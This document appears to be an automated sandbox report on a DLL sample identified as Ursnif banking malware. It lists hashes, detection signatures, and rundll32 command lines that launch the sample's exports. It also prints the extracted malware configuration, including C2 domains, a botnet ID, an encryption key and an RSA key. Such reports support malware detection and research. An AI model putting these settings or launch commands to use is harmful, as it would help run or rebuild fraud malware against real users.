Play interactive tour

Edit tour

Analysis Report 606e7fb752fbd.rar.dll

Overview

General Information

Sample Name:	606e7fb752fbd.rar.dll
Analysis ID:	383661
MD5:	8bf44d2b3b9b7c0fa2754fbe6ad14a63
SHA1:	76d4ed4512d34edd5a34b917957654fedbfae23f
SHA256:	cb7c95db9ce05d2304a4a98687a4b92f85081e1b7397820a52487b277ee1f2e1
Tags:	BRTdllgeogoziisfbITAursnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6444 cmdline: loaddll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6456 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6476 cmdline: rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Choosethan MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6516 cmdline: rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Especiallyyes MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6532 cmdline: rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Guesscover MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6552 cmdline: rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Learncut MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6596 cmdline: rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,OnceOut MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "YKwVOU5rJLi0k2wc/Sa//orn/I3K6zI6HgJKpraE6XyxxZAjZUdVyZ9IFso22JAAB2G4qzzp3TU2DJqhIyPO7xVeI9l7K9H9VlKfzYozAbxBQCrtZPEdPyCguw2FwPnt3aL3viJmXn26e8PXSevTHzQdNxMCe42eyfgYxlDVzbkJTLhI91j/G+/dxO1/TdYY"}, {"c2_domain": ["ocsp2.digicert.com", "aus6.mozilla.org", "durenoluneer.xyz", "surenoluneer.xyz"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
4.3.rundll32.exe.c5a4b1.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.6d450000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.6d450000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.f1a4b1.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.eca4b1.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6d450000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.6d450000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.4cc94a0.2.raw.unpack

Malware Configuration Extractor: Ursnif [{"RSA Public Key": "YKwVOU5rJLi0k2wc/Sa//orn/I3K6zI6HgJKpraE6XyxxZAjZUdVyZ9IFso22JAAB2G4qzzp3TU2DJqhIyPO7xVeI9l7K9H9VlKfzYozAbxBQCrtZPEdPyCguw2FwPnt3aL3viJmXn26e8PXSevTHzQdNxMCe42eyfgYxlDVzbkJTLhI91j/G+/dxO1/TdYY"}, {"c2_domain": ["ocsp2.digicert.com", "aus6.mozilla.org", "durenoluneer.xyz", "surenoluneer.xyz"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Source: 606e7fb752fbd.rar.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 606e7fb752fbd.rar.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\hot\905_grow\310_Together\Brought.pdb source: loaddll32.exe, 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.908140362.000000006D500000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.901888879.000000006D500000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.908539337.000000006D500000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.910191671.000000006D500000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.901601437.000000006D500000.00000002.00020000.sdmp, 606e7fb752fbd.rar.dll

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.3.rundll32.exe.c5a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.f1a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.eca4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d450000.2.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.3.rundll32.exe.c5a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.f1a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.eca4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d450000.2.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D452375 NtQueryVirtualMemory,		2_2_6D452375
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D452375 NtQueryVirtualMemory,		3_2_6D452375

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D494D40	0_2_6D494D40
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D492FAD	0_2_6D492FAD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C6EC9	0_2_6D4C6EC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A6B40	0_2_6D4A6B40
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D456B50	0_2_6D456B50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C3507	0_2_6D4C3507
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4695D0	0_2_6D4695D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D465590	0_2_6D465590
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B05A8	0_2_6D4B05A8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4641B0	0_2_6D4641B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4BA02F	0_2_6D4BA02F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D00FC	0_2_6D4D00FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D452154	2_2_6D452154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D494D40	2_2_6D494D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4C3507	2_2_6D4C3507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D492FAD	2_2_6D492FAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4641B0	2_2_6D4641B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4BA02F	2_2_6D4BA02F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A6B40	2_2_6D4A6B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D452154	3_2_6D452154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D494D40	3_2_6D494D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4C3507	3_2_6D4C3507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D492FAD	3_2_6D492FAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4641B0	3_2_6D4641B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4BA02F	3_2_6D4BA02F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4A6B40	3_2_6D4A6B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D494D40	4_2_6D494D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4C3507	4_2_6D4C3507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D492FAD	4_2_6D492FAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4641B0	4_2_6D4641B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4BA02F	4_2_6D4BA02F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4A6B40	4_2_6D4A6B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D494D40	5_2_6D494D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4C3507	5_2_6D4C3507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4A4C5F	5_2_6D4A4C5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D492FAD	5_2_6D492FAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4641B0	5_2_6D4641B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4BA02F	5_2_6D4BA02F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4A6B40	5_2_6D4A6B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D494D40	6_2_6D494D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D492FAD	6_2_6D492FAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4C6EC9	6_2_6D4C6EC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4A6B40	6_2_6D4A6B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D456B50	6_2_6D456B50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4C3507	6_2_6D4C3507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4695D0	6_2_6D4695D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D465590	6_2_6D465590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4B05A8	6_2_6D4B05A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4641B0	6_2_6D4641B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4BA02F	6_2_6D4BA02F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4D00FC	6_2_6D4D00FC

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6D490E9E appears 83 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D490ED2 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D491790 appears 123 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D490E9E appears 407 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D4B491D appears 55 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D4B4776 appears 74 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D490F09 appears 35 times

Source: 606e7fb752fbd.rar.dll

Binary or memory string: OriginalFilenameBrought.dll. vs 606e7fb752fbd.rar.dll

Source: 606e7fb752fbd.rar.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal56.troj.winDLL@15/0@0/0

Source: 606e7fb752fbd.rar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Choosethan

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Choosethan
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Especiallyyes
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Guesscover
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Learncut
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,OnceOut
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Choosethan	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Especiallyyes	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Guesscover	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Learncut	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,OnceOut	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: 606e7fb752fbd.rar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 606e7fb752fbd.rar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 606e7fb752fbd.rar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 606e7fb752fbd.rar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 606e7fb752fbd.rar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 606e7fb752fbd.rar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 606e7fb752fbd.rar.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 606e7fb752fbd.rar.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 606e7fb752fbd.rar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 606e7fb752fbd.rar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 606e7fb752fbd.rar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 606e7fb752fbd.rar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 606e7fb752fbd.rar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6D451745 LoadLibraryA,GetProcAddress,

2_2_6D451745

Source: 606e7fb752fbd.rar.dll

Static PE information: real checksum: 0xfd487 should be: 0xff097

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D490E67 push ecx; ret	0_2_6D490E7A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4917D6 push ecx; ret	0_2_6D4917E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D452143 push ecx; ret	2_2_6D452153
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4520F0 push ecx; ret	2_2_6D4520F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4917D6 push ecx; ret	2_2_6D4917E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D490E67 push ecx; ret	2_2_6D490E7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D452143 push ecx; ret	3_2_6D452153
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4520F0 push ecx; ret	3_2_6D4520F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4917D6 push ecx; ret	3_2_6D4917E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D490E67 push ecx; ret	3_2_6D490E7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4917D6 push ecx; ret	4_2_6D4917E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D490E67 push ecx; ret	4_2_6D490E7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4917D6 push ecx; ret	5_2_6D4917E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D490E67 push ecx; ret	5_2_6D490E7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D490E67 push ecx; ret	6_2_6D490E7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4917D6 push ecx; ret	6_2_6D4917E9

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.3.rundll32.exe.c5a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.f1a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.eca4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d450000.2.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D4B3EDA

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6D451745 LoadLibraryA,GetProcAddress,

2_2_6D451745

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4BAD71 mov eax, dword ptr fs:[00000030h]	0_2_6D4BAD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4BAD71 mov eax, dword ptr fs:[00000030h]	2_2_6D4BAD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D541746 mov eax, dword ptr fs:[00000030h]	2_2_6D541746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D54167C mov eax, dword ptr fs:[00000030h]	2_2_6D54167C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D541283 push dword ptr fs:[00000030h]	2_2_6D541283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4BAD71 mov eax, dword ptr fs:[00000030h]	3_2_6D4BAD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D541746 mov eax, dword ptr fs:[00000030h]	3_2_6D541746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D54167C mov eax, dword ptr fs:[00000030h]	3_2_6D54167C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D541283 push dword ptr fs:[00000030h]	3_2_6D541283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4BAD71 mov eax, dword ptr fs:[00000030h]	4_2_6D4BAD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D541746 mov eax, dword ptr fs:[00000030h]	4_2_6D541746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D54167C mov eax, dword ptr fs:[00000030h]	4_2_6D54167C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D541283 push dword ptr fs:[00000030h]	4_2_6D541283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4BAD71 mov eax, dword ptr fs:[00000030h]	5_2_6D4BAD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4BAD71 mov eax, dword ptr fs:[00000030h]	6_2_6D4BAD71

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4B3EDA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D491078 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D491078
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D49138C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D49138C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D4B3EDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D491078 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6D491078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6D4B3EDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D491078 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6D491078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6D4B3EDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D491078 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6D491078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D4B3EDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D491078 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6D491078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D4B3EDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6D4B3EDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D491078 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6D491078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6D49138C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6D49138C

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1

Jump to behavior

